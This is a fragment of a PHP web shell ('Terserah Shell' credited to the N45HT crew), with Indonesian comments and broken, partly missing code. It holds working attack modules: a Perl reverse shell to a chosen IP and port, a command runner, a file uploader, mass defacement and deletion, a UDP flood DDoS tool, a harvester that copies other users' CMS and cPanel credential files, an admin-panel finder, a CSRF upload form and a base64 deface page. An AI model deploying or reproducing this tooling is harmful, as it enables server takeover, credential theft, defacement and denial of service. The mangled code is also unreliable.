<a href="#" onclick="MM_openBrWindow('?edit=file&file=<?
=$file?>&bug=<?=$bugs?>','File
></a>
</td>
<td align="center"><?=$last?> GMT+9</td>
<td align="right"><?=$size?> byte</td>
}
function mout(aa) {
}
</script>
</tr>
<?php
}
}
}
}
if($_POST['textV']<>""){
$text=$_POST['textV'];
if(@preg_match("/$text/", $op)) {
$i++;
?>
<td align="right"><?=$i?></td>
<td align="center"><?=$text?></td>
<td align="left">
<a href="#" onclick="MM_openBrWindow('?edit=file&file=<?
=$file?>&bug=<?=$text?>','File
></a>
</td>
<td align="center"><?=$last?> GMT+9</td>
<td align="right"><?=$size?> byte</td>
}
function mout(aa) {
}
</script>
</tr>
<?php
}
}
}
}
}
if($i==0){
foreach($cek as $bugs) {
if ($bugs<>""){
$x++;
?>
<td align="right"><?=$x?></td>
<td align="center"><?=$bugs?></td>
<td align="center"> not exist </td>
<td align="center"> no record </td>
<td align="right"> -��byte </td>
</tr>
<?php
}
}
}
?>
</table>
<?php
}else{
$find =
array('default','base64_decode','system','passthru','popen','exec','shell_exec','ev
al','move_uploaded_file');
?>
<form id="fCheck" name="fCheck" method="post" action="" autocomplete="off">
<center>
<table class="single" width="400" border="1" -webkit-box-shadow: 0px 0px 15px
#55FF55; cellpadding="10">
<tr><td class="me"><center>
<table class="me" width="200">

<tr><td class="me">
function cekKlik(){
if (!document.fCheck.cekV.checked)
document.fCheck.textV.disabled=true;
else
document.fCheck.textV.disabled=false;
if(document.fCheck.cekV.checked){
master = master + 1;
}else{
if(master > 0 ){
master = master - 1;
}else{
master = master;
}
}
if(master != 0){
document.fCheck.Submit.disabled=false;
}else{
document.fCheck.Submit.disabled=true;
}
}
</script>
<?php
//dari sini
foreach($find as $bug) {
?>
var master = 0;
function checkValue<?=$bug?>(){
if(document.fCheck.<?=$bug?>.checked){
master = master + 1;
}else{
if(master > 0 ){
master = master - 1;
}else{
master = master;
}
}
if(master != 0){
document.fCheck.Submit.disabled=false;
}else{
document.fCheck.Submit.disabled=true;
}
}
</script>
<input onclick="checkValue<?=$bug?>();" name="<?=$bug?>"
type="checkbox" id="<?=$bug?>" value="<?=$bug?>" />�<?=$bug?><br>
<?php
}
?>
<input name="cekV" type="checkbox" onClick="cekKlik();" id="cekV"
value="cekV">
<input class="isi" disabled="disabled" name="textV" value="other key
word" onFocus="this.select()" type="text" id="textV">
<br><br>
<input type="hidden" name="asal" value="abcd">
<input disabled="disabled" type="submit" name="Submit" value=" Start
" />
</td></tr>
</table>
</td></tr></table>
</form>
<?php
}
?>
<br><br><hr width="300">
<?php
} elseif($_GET['do'] == 'bconnet') {
echo '<div id="login" style="margin-top: 10px; margin-left: 10px;">';
echo '<form action="?page=bcon" method="get"><input type="hidden"
name="page" value="bcon"/>';
echo 'IP:<br><input type="text" name="ip" value="'.getenv("remote_addr").'"
style="margin-top: 5px;"/><br><br>';
echo 'Port:<input type="submit" value="Connect" style="margin-left: 130px;
margin-top: -4px;"/><br><input type="text" name="port" value="666" style="margin-
top: 5px;"/>';
echo '</form>';
echo '</div>';
if(isset($_GET['ip']) && isset($_GET['port'])){
$ip = $_GET['ip'];
$port = $_GET['port'];
$bc = fopen("/tmp/bxcon.pl","w");
fwrite($bc,'#!/usr/bin/perl
use Socket;
$iaddr=inet_aton("'.$ip.'") || die("Error: $!\n");
$paddr=sockaddr_in("'.$port.'", $iaddr) || die("Error: $!\n");
$proto=getprotobyname("tcp");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("/bin/sh -i");
close(STDIN);
close(STDOUT);
close(STDERR);');
fclose($bc);
shell_exec("perl /tmp/bxcon.pl");
unlink("/tmp/bxcon.pl");
}
break;
echo '</td>
</tr>
</table>
<br><center>xB1N4RYx ~ 2012</center><br>
</body>
</html>';
function rooting()
{
echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader"
id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit"
id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo
'<b>Yuklendi</b><br><br>'; }
else { echo '<b>Basarisiz</b><br><br>'; }
}
}
$x = $_GET["x"];
Switch($x){
case "rooting";
rooting();
break;
}
}elseif($_GET['do'] == 'infosys') {
echo '<center><div id="menu" >';

echo "<ul>";
echo "System: <font color=blue>".$kernel."</font><br>";
echo "User: <font color=blue>".$user."</font> (".$uid.") Group: <font color=blue>".
$group."</font> (".$gid.")<br>";
echo "Server IP: <font color=blue>".$ip."</font> | Your IP: <font color=blue>".
$_SERVER['REMOTE_ADDR']."</font><br>";
echo "HDD: <font color=blue>$used</font> / <font color=blue>$total</font> ( Free:
<font color=blue>$freespace</font> )<br>";
echo "Safe Mode: $sm<br>";
echo "Disable Functions: $show_ds<br>";
echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")<br>";
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl
<br>";
echo "<hr>";
} elseif($_GET['do'] == 'endeco') {
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$text = $_POST['code'];
?>
<form method="post"><br>
<textarea class='form-control con7' cols=80 rows=10 name="code"></textarea><br><br>
<select class='form-control con7' size="1" name="ope">
<center><option value="urlencode">url</option>
<option value="base64">Base64</option>
<option value="ur">convert_uu</option>
<option value="json">json</option>
<option value="gzinflates">gzinflate - base64</option>
<option value="str2">str_rot13 - base64</option>
<option value="gzinflate">str_rot13 - gzinflate - base64</option>
<option value="gzinflater">gzinflate - str_rot13 - base64</option>
<option value="gzinflatex">gzinflate - str_rot13 - gzinflate - base64</option>
<option value="gzinflatew">str_rot13-convert_uu-url-gzinflate-str_rot13-base64-
convert_uu-gzinflate-url-str_rot13-gzinflate-base64</option>
<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>

<option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate -
base64</option></center>
</select> <br><br><input class='kntd' type='submit' name='submit'
value='Encode'>
<input class='kntd' type='submit' name='submits' value='Decode'>
</form>
<br>
<?php
$submit = $_POST['submit'];
switch ($op) {case 'base64': $codi=base64_encode($text);
break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
break;case 'json' : $codi=json_encode(utf8_encode($text));
break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
$codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
$codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(bas
e64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text)))))))
)))));
break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
break;case 'str2' : $codi=base64_encode(str_rot13($text));
break;case 'urlencode' : $codi=rawurlencode($text);
break;case 'ur' : $codi=convert_uuencode($text);
break;case 'url' :
$codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($t
ext))))));
$submit = $_POST['submits'];
switch ($op) {case 'base64': $codi=base64_decode($text);
break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
break;case 'json' : $codi=utf8_dencode(json_dencode($text));
break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
$codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
$codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(con
vert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text)))))))
)))));
break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
break;case 'str2' : $codi=str_rot13(base64_decode($text));
break;case 'urlencode' : $codi=rawurldecode($text);
break;case 'ur' : $codi=convert_uudecode($text);
break;case 'url' :
$codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($
text)))))));
$html = htmlentities(stripslashes($codi));
echo "<from><textarea cols=80 rows=10 class='form-control con7' >".
$html."</textarea><BR/><BR/></center><br></from>";
}
elseif($_GET['do'] == 'about') {
?>
<br>
<div class="terimakasih">
<tr><td><center><font color="gold">Discovering And Exploiting Security Flaws.
<p><font color="Lavender">Thanks To : Rinto AR , ShinChan , PETR03X , Mr.x0x ,
IndoXploit, And Member N45HT</font>
<br><a href="https://www.facebook.com/groups/N45HTOfficial/">JOIN TO GROUP OFFICIAL
N45HT</a>
<br><font color="Lavender"><font></font> <br>Terserah Shell Create By LugiX
From N45HT Crew
</td></tr>
<?php
} elseif($_GET['do'] == 'csrf') {
?> <html>
<title>CSRF EXPLOITER ONLINE</title>
<center><br><br><br><br>
<font color=Lavenda>*Note : Post File, Type : Filedata / dzupload / dzfile /
dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
<center>
URL: <input type="text" name="url" size="50" height="10"
placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto;
padding-left: 5px;" required><br>
POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat
Diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
<input type="submit" name="d" value="Lock!">
</form>
<?php
//gak penting
@$url = $_POST['url'];
@$pf = $_POST['pf'];
@$d = $_POST['d'];
if($d) {
//baccod
echo "<form method='post' target='_blank' action='$url'

enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit'
name='g' value='Upload Cok!'></form";
}
?>
</form>
</html>
<?php
} elseif($_GET['do'] == 'admf') {
?>
<type='text/javascript'/></script>
<style>
</style>
</head>
<link rel="SHORTCUT ICON" href="http://i.imgur.com/2Koa43H.png">
</style>
<br>
<br><center><font color='Lavenda'> NB: Jika Mau Jalankan Tools ini, Belakang Domain
Tambahkan " / " </font></center>
<br>
<td width=100% id=Gretz>
<form action="" method="post">
<center><p class="frontboxtext"><input name="hash_lol" class="textbox" type="text"
size="30" value="http://www.target.co.il/"/>
<input name="submit_lol" class="textbox" value="Submit Site" type="submit">
</form>
<?php
set_time_limit(0);
if (isset($_POST["submit_lol"])) {
$url = $_POST['hash_lol'];
echo "<br />Crot ".$url."<br /><br />";
$adminlocales = array("-adminweb/","!
adminweb/","@adminweb/","adminweb121/","adminweb90/","adminweb145/","khususadmin/",
"rahasiaadm/","adminweb123123/","adminweb2222/","adminlanel/","adminlanel.php/","mo
nitor123.php/","masuk.php/","css.php/", "admin1235.php/",
"master.php/","1admin/","123admin/","addmin/","home.php","css/","rediect.php/","mas
uk.php/","index.php/","webpaneladmin123/","registeradm/","register/","member123/","
123adminweb/","123paneladminweb/","panelauth1231/","loginadminweb21/","loginadminwe
b123/","loginadminweb/","webadmin123/","redakturadmin/","paneladminweb/","admlogina
dm/","4dm1n/","admin12345/","adminweb12/","adminweb111/","adminweb123/","adminweb1/
","gangmasuk/","gangadmin/","admredaktur/","adminwebredaktur/","adminredaktur/","ad
m/", "_adm_/", "_admin_/", "_loginadm_/", "_login_admin_/", "minmin",
"loginadmin3/", "masuk/admin", "webmail", "_loginadmin_/", "_login_admin.php_/",
"_admin_/", "_administrator_/", "operator/", "sika/", "adminweb/", "develop/",
"ketua/", "redaktur/", "author/", "admin/", "administrator/", "adminweb/", "user/",
"users/", "dinkesadmin/", "retel/", "author/", "panel/", "paneladmin/",
"panellogin/", "redaksi/", "cp-admin/", "login@web/", "admin1/", "admin2/",
"admin3/", "admin4/", "admin5/", "admin6/", "admin7", "admin8", "admin9",
"admin10", "master/", "master/index.php", "master/login.php", "operator/index.php",
"sika/index.php", "develop/index.php", "ketua/index.php","redaktur/index.php",
"admin/index.php", "administrator/index.php", "adminweb/index.php",
"user/index.php", "users/index.php", "dinkesadmin/index.php", "retel/index.php",
"author/index.php", "panel/index.php", "paneladmin/index.php",
"panellogin/index.php", "redaksi/index.php", "cp-admin/index.php",
"operator/login.php", "sika/login.php", "develop/login.php", "ketua/login.php",
"redaktur/login.php", "admin/login.php", "administrator/login.php",
"adminweb/login.php", "user/login.php", "users/login.php", "dinkesadmin/login.php",
"retel/login.php", "author/login.php", "panel/login.php", "paneladmin/login.php",
"panellogin/login.php", "redaksi/login.php", "cp-admin/login.php", "terasadmin/",
"terasadmin/index.php", "terasadmin/login.php", "rahasia/", "rahasia/index.php",
"rahasia/admin.php", "rahasia/login.php", "dinkesadmin/", "dinkesadmin/login.php",
"adminpmb/", "adminpmb/index.php", "adminpmb/login.php", "system/",
"system/index.php", "system/login.php", "webadmin/", "webadmin/index.php",
"webadmin/login.php", "wpanel/", "wpanel/index.php", "wpanel/login.php",
"adminpanel/index.php", "adminpanel/", "adminpanel/login.php", "adminkec/",
"adminkec/index.php", "adminkec/login.php", "admindesa/", "admindesa/index.php",
"admindesa/login.php", "adminkota/", "adminkota/index.php", "adminkota/login.php",
"admin123/", "admin123/index.php", "dologin/", "home.asp/","supervise/amdin",
"relogin/adm", "checkuser", "relogin.php", "relogin.asp", "wp-admin",
"registration", "suvervise", "superman.php", "member.php","home/admin","po-
admin/","do_login.php", "bo-login", "bo_login.php/", "index.php/admin",
"admiiin.php", "masuk/adm","website_login/", "dashboard/admin", "dashboard.php",
"dashboard_adm", "admin123/login.php", "logout1/", "logout/","pengelola/login",
"manageradm/", "logout.asp", "manager/adm", "pengelola/web","auth/panel",
"logout/index.php", "logout/login.php", "controladm/", "logout/admin.php",
"adminweb_setting", "adm/index.asp", "adm.asp", "affiliate.asp", "adm_auth.asp",
"memberadmin.asp", "siteadmin/login.asp", "siteadmin/login", "paneldecontrol",
"cms/admin", "administracion.php", "/ADMON/", "administrador/", "panelc/",
"admincp", "admcp", "cp", "modcp", "moderatorcp", "adminare", "cpanel",
"controlpanel");
foreach ($adminlocales as $admin){

$headers = get_headers("$url$admin");
if (eregi('200', $headers[0])) {
echo "<a href='$url/$admin'>$url$admin</a> <font color='gold'>Ketemu Nih !
</font><br />";
}
else {
echo "$url$admin <font color='red'>Tidak Ketemu</font><br />";
}
}
}
} elseif($_GET['do'] == 'cmd') {
echo "<form method='post'>
<font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
<input type='text' size='30' height='10' name='cmd'><input type='submit'
name='do_cmd' value='>>'>
</form>";
if($_POST['do_cmd']) {
echo "<pre>".exe($_POST['cmd'])."</pre>";
}
} elseif($_GET['do'] == 'mass_deface') {
function sabun_massal($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=blue>DONE</font>] $lokasi<br>";
$idx = sabun_massal($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function sabun_biasa($dir,$namafile,$isi_script) {
if($dirb === '.') {
} elseif($dirb === '..') {
} else {
if(is_dir($dirc)) {
echo "[<font color=blue>DONE</font>] $dirb/
$namafile<br>";
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe_sabun'] == 'mahal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif($_POST['tipe_sabun'] == 'murah') {
sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<center>";
<font style='text-decoration: underline;'>Tipe Sabun:</font><br>
<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input
type='radio' name='tipe_sabun' value='mahal'>Massal<br>
<font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='$dir' style='width: 450px;'
height='10'><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input type='text' name='d_file' value='index.php' style='width: 450px;'
height='10'><br>
<font style='text-decoration: underline;'>Index File:</font><br>
<textarea name='script' style='width: 450px; height: 200px;'>LugiX Shell
Code</textarea><br>
<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
</form></center>";
}
} elseif($_GET['do'] == 'ddos') {
?>
<html>
<form action=" " method="post">
<center><br><br><br>
Your IP: <font color="Lavender"><b><?php echo $my_ip; ?></b></font>�(Don't DoS
yourself nub)<br><br>
<table class="tabnet" style="width:333px;padding:0 1px;">
<th colspan="5">Ddos Tool</th>
<tr><tr><td>IP Target</td><td>:</td>
<td><input type="text" class="inputz" name="ip" size="48" maxlength="25" value =
"0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if (
this.value == '0.0.0.0' ) this.value = '';"/>
</td></tr>
<tr><td>Time</td><td>:</td>
<td><input type="text" class="inputz" name="time" size="48" maxlength="25" value =
"time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in
seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value =
'';"/>
</td></tr>
<tr><td>Port</td><td>:</td>
<td><input type="text" class="inputz" name="port" size="48" maxlength="5" value =
"port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if
( this.value == 'port' ) this.value = '';"/>
</td></tr></tr></table></b><br>
<input type="submit" class="inputzbut" name="fire" value=" Firee !!! ">
<br><br>
<center>
<font color="Lavender">Seteleh selesai menggunakan tools ini segera refresh
browsingmu
</center>
</form>
</center>
<?php
@$submit = $_POST['fire'];
if (isset($submit)) {
$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_POST['time'];
$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time + $exec_time;
for ($i = 0;$i < 65535;$i++) {
$out.= "X";
}
while (1) {
$packets++;
if (time() > $max_time) {
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at " . time('h:i:s') . " with $packets (" .
round(($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets /
$exec_time, 2) . " packets/s
";
}
} elseif($_GET['do'] == 'mass_delete') {
function hapus_massal($dir,$namafile) {
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(file_exists($lokasi)) {
echo "[<font color=blue>DELETED</font>]
$lokasi<br>";
unlink($lokasi);
$idx = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<center>";
<font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='$dir' style='width: 450px;'
height='10'><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input type='text' name='d_file' value='index.php' style='width: 450px;'
height='10'><br>
<input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
</form></center>";
}
} elseif($_GET['do'] == 'config') {
$etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read
/etc/passwd</font></pre>");
$idx = mkdir("idx_config", 0777);
$isi_htc = "Options all\nRequire None\nSatisfy Any";
$htc = fopen("idx_config/.htaccess","w");
fwrite($htc, $isi_htc);
while($passwd = fgets($etc)) {
if($passwd == "" || !$etc) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_config);
foreach($user_config[1] as $user_idx) {
$user_config_dir = "/home/$user_idx/public_html/";
if(is_readable($user_config_dir)) {
$grab_config = array(
"/home/$user_idx/.my.cnf" => "cpanel",
"/home/$user_idx/.accesshash" => "WHM-accesshash",
"/home/$user_idx/public_html/po-content/config.php" =>
"Popoji",
"/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
"/home/$user_idx/public_html/bw-configs/config.ini" =>
"BosWeb",
"/home/$user_idx/public_html/config/koneksi.php" =>
"Lokomedia",
"/home/$user_idx/public_html/lokomedia/config/koneksi.php"
=> "Lokomedia",
"/home/$user_idx/public_html/clientarea/configuration.php"
=> "WHMCS",
"/home/$user_idx/public_html/whm/configuration.php" =>
"WHMCS",
"/home/$user_idx/public_html/whmcs/configuration.php" =>
"WHMCS",
"/home/$user_idx/public_html/forum/config.php" => "phpBB",
"/home/$user_idx/public_html/sites/default/settings.php" =>
"Drupal",
"/home/$user_idx/public_html/config/settings.inc.php" =>
"PrestaShop",
"/home/$user_idx/public_html/app/etc/local.xml" =>
"Magento",
"/home/$user_idx/public_html/joomla/configuration.php" =>
"Joomla",
"/home/$user_idx/public_html/configuration.php" =>
"Joomla",
"/home/$user_idx/public_html/wp/wp-config.php" =>
"WordPress",
"/home/$user_idx/public_html/wordpress/wp-config.php" =>
"WordPress",
"/home/$user_idx/public_html/wp-config.php" => "WordPress",
"/home/$user_idx/public_html/admin/config.php" =>
"OpenCart",
"/home/$user_idx/public_html/slconfig.php" => "Sitelok",
"/home/
$user_idx/public_html/application/config/database.php" => "Ellislab");
foreach($grab_config as $config => $nama_config) {
$ambil_config = file_get_contents($config);
if($ambil_config == '') {
} else {
$file_config = fopen("idx_config/$user_idx-
$nama_config.txt","w");
fputs($file_config,$ambil_config);
}
}
}
}
}
}
echo "<center><a href='?dir=$dir/idx_config'><font
color=blue>Done</font></a></center>";
} elseif($_GET['do'] == 'jumping') {
$i = 0;
echo "<div class='margin: 5px auto;'>";
if(preg_match("/hsphere/", $dir)) {
$urls = explode("\r\n", $_POST['url']);
if(isset($_POST['jump'])) {
echo "<pre>";
foreach($urls as $url) {
$url = str_replace(array("http://","www."), "", strtolower($url));
$etc = "/etc/passwd";
$f = fopen($etc,"r");
while($gets = fgets($f)) {
$pecah = explode(":", $gets);
$user = $pecah[0];
$dir_user = "/hsphere/local/home/$user";
if(is_dir($dir_user) === true) {
$url_user = $dir_user."/".$url;
if(is_readable($url_user)) {
$i++;
$jrw = "[<font color=blue>R</font>] <a href='?
dir=$url_user'><font color=lavender>$url_user</font></a>";
if(is_writable($url_user)) {
$jrw = "[<font color=blue>RW</font>] <a href='?
dir=$url_user'><font color=lavender>$url_user</font></a>";
}
echo $jrw."<br>";
}
}
}
}
if($i == 0) {
} else {
echo "<br>Total ada ".$i." Kamar di ".$ip;
}
echo "</pre>";
} else {
echo '<center>
List Domains: <br>
<textarea name="url" style="width: 500px; height: 250px;">';
$fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
while($getss = fgets($fp)) {
echo $getss;
}
echo '</textarea><br>
<input type="submit" value="Jumping" name="jump" style="width:
500px; height: 25px;">
</form></center>';
}
} elseif(preg_match("/vhosts/", $dir)) {
$urls = explode("\r\n", $_POST['url']);
if(isset($_POST['jump'])) {
echo "<pre>";
foreach($urls as $url) {
$web_vh = "/var/www/vhosts/$url/httpdocs";
if(is_dir($web_vh) === true) {
if(is_readable($web_vh)) {
$i++;
dir=$web_vh'><font color=gold>$web_vh</font></a>";
if(is_writable($web_vh)) {
dir=$web_vh'><font color=gold>$web_vh</font></a>";
}
echo $jrw."<br>";
}
}
}
if($i == 0) {
} else {
}
echo "</pre>";
} else {
echo '<center>
List Domains: <br>
<textarea name="url" style="width: 500px; height: 250px;">';
bing("ip:$ip");
echo '</textarea><br>
<input type="submit" value="Jumping" name="jump" style="width:
500px; height: 25px;">
</form></center>';
}
} else {
echo "<pre>";
$etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read
/etc/passwd</font>");
while($passwd = fgets($etc)) {
if($passwd == '' || !$etc) {
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
foreach($user_jumping[1] as $user_idx_jump) {
$user_jumping_dir = "/home/$user_idx_jump/public_html";
if(is_readable($user_jumping_dir)) {
$i++;
dir=$user_jumping_dir'><font color=lavender>$user_jumping_dir</font></a>";
if(is_writable($user_jumping_dir)) {
dir=$user_jumping_dir'><font color=lavender>$user_jumping_dir</font></a>";
}
echo $jrw;
if(function_exists('posix_getpwuid')) {
$domain_jump = file_get_contents("/etc/named.conf");
if($domain_jump == '') {
echo " => ( <font color=red>gabisa ambil nama
domain nya</font> )<br>";
} else {
preg_match_all("#/var/named/(.*?).db#",
$domain_jump, $domains_jump);
foreach($domains_jump[1] as $dj) {
$user_jumping_url =
posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_jumping_url = $user_jumping_url['name'];
if($user_jumping_url == $user_idx_jump) {
echo " => ( <u>$dj</u> )<br>";
break;
}
}
}
} else {
echo "<br>";
}
}
}
}
}
if($i == 0) {
} else {
}
echo "</pre>";
}
echo "</div>";
} elseif($_GET['do'] == 'autoklik') {
?>
<input type="submit" name="x" value="index.php">
</form>
<?php
$target = explode("\r\n", $_POST['target']);
if($_POST['x']) {
foreach($target as $korban) {
$global = "index.php";
$isi_nama_doang =
"PGh0bWwgbGFuZz0iZW4tVVMiPjxoZWFkPjx0aXRsZT5OdXNhbnRhcmEgNDUgSGFja2VyIFRlYW08L3RpdG
xlPjwhLS0tQnkgTXIueDB4IERvbm50IENvcGFzIEN1ayAtLT4NCjxtZXRhIHByb3BlcnR5PSJvZzp0aXRsZ
SIgY29udGVudD0iV2FzIEhlcmUiPg0KPG1ldGEgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiBjb250ZW50
PSJ+IE40NUhUIH4iPg0KPG1ldGEgcHJvcGVydHk9Im9nOmF1dGhvciIgY29udGVudD0iTXIueDB4Ij4NCg0
KPG1ldGEgY2hhcnNldD0iVVRGLTgiPg0KDQoNCjxzdHlsZT5ib2R5e2JhY2tncm91bmQ6IzAwMDtmb250LW
ZhbWlseTpDb3VyaWVyIG5ldzt0ZXh0LWFsaWduOmNlbnRlcjtjb2xvcjojZmZmO31wcmV7bWFyZ2luLXRvc
DoxJTsNCiAgICAgICBjdXJzb3I6IHVybChodHRwOi8vY3VyLmN1cnNvcnMtNHUubmV0L2N1cnNvcnMvY3Vy
LTkvY3VyODYyLmFuaSksIHVybChodHRwOi8vY3VyLmN1cnNvcnMtNHUubmV0L2N1cnNvcnMvY3VyLTkvY3V
yODYyLnBuZyksIHByb2dyZXNzICFpbXBvcnRhbnQ7DQp9DQpmb250IHtib3gtc2hhZG93OiAwIDAgMTBweC
BkYXJrYmx1ZTt9DQoNCiA8L3N0eWxlPg0KDQoNCjwvaGVhZD48Ym9keSBvbmNvbnRleHRtZW51PSJyZXR1c
m4gZmFsc2UiIG9ua2V5ZG93bj0icmV0dXJuIGZhbHNlIiBvbm1vdXNlZG93bj0icmV0dXJuIGZhbHNlIj48
YnI+PGJyPjxicj4NCjxjZW50ZXI+PGltZyBzdHlsZT0id2lkdGg6MzIwcHg7IiBzcmM9Imh0dHBzOi8vMi5
icC5ibG9nc3BvdC5jb20vLW8wR2RNeUVoOWx3L1dHX2hWVFdaUU1JL0FBQUFBQUFBQXdVL0M4VkF0aXFaU2
5FbzZPX2s2dkg4WnJZTHByRTA3czBMZ0NMY0IvczE2MDAvTjQ1SFQlMkIlMjUyODIlMjUyOS5wbmciPjwvY
2VudGVyPg0KICAgICAgDQogICAgICANCgkgIDxicj4NCiAgICAgIDxicj4NCiAgICANCgkgIA0KICAgICAg
ICAgPG1hcnF1ZWUgYmVoYXZpb3I9ImFsdGVybmF0ZSIgc2Nyb2xsYW1vdW50PSIzIiB3aWR0aD0iNDUlIiB
zdHlsZT0id2lkdGg6IDQ1JTsiPkRpc2NvdmVyaW5nIEFuZCBFeHBsb2l0aW5nIFNlY3VyaXR5IEZsYXdzPC
9tYXJxdWVlPg0KPHByZT48Zm9udCBjb2xvcj0icmVkIj5bPC9mb250Pk40NUhUIE9mZmljaWFsIE5pY2s8Z
m9udCBjb2xvcj0icmVkIj5dPC9mb250Pg0KDQp8IElkYVJhaG1hIHwgS2lsbCBNZSB8IEJyb2tlbiBBbmdl
bCB8IFNoaW5DaGFuIHwgLi9Nci5CbGFuazAwNyB8IFNDWVRIRTQwNF9MT0wgfCBQRVRSMDNYIHwgUjN4WW4
tMDFgIHwgSjROQzBLIHwgRlJVXzQwMyB8IGthc2lhbiB8IE1SWSANCnwgc2lsdW1hbi5uYW5hcyB8IC9tci
5BbmRybzBURkwgfCBUcmlwbGUgQSB8IE5vb2JfT3JiIHwgQk9DQUggS1JJTUlOQUwgfCByMDA3QHVua24wd
24gfCBNclg0MDQgfCBNaXN0ZXJzJCB8IEFic1RyYXggfCBJbmlzaWFsLUMgDQp8IHVzZXI5OCB8IEplcnVr
SUQyNyB8IFRpbmFtYVRfVGVhTSB8IE1yLiBTM1BVTDBIIHwgTVIuVTEzIHwgRGFya19PcmFjbGUgfCBNci4
geDB4IHwgTXIuQ3I0YnMgfCBTZXh5R2lyIHwgQmFuZ0RlYmJ6IHwgQ0tNXzUwMSB8IEFuZCBBbGwgVGVhbS
BONDVIVCB8DQogPC9wcmU+DQoJICAgICAgICANCgkgPGJyPiAJICANCjxmb250IGNvbG9yPSJ3aGl0ZSIgc
2l6ZT0iMiI+VGhhbmtzIFRvKiA6IE40NUhUICwgU2hpbkNoYW4gLFBFVFIwM1ggLCBSaW50byBBUiA8L2Zv
bnQ+DQo8YnI+Izw/cGhwDQokaXAgPSAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsNCmVjaG8gIiBZb3VyIEl
QOiAkaXAgIjsNCj8+DQogICANCiAgICAgDQogPC9ib2R5PjwvaHRtbD4=";
$decode_isi = base64_decode($isi_nama_doang);
$encode = base64_encode($global);
$ss = fopen($global,"w");
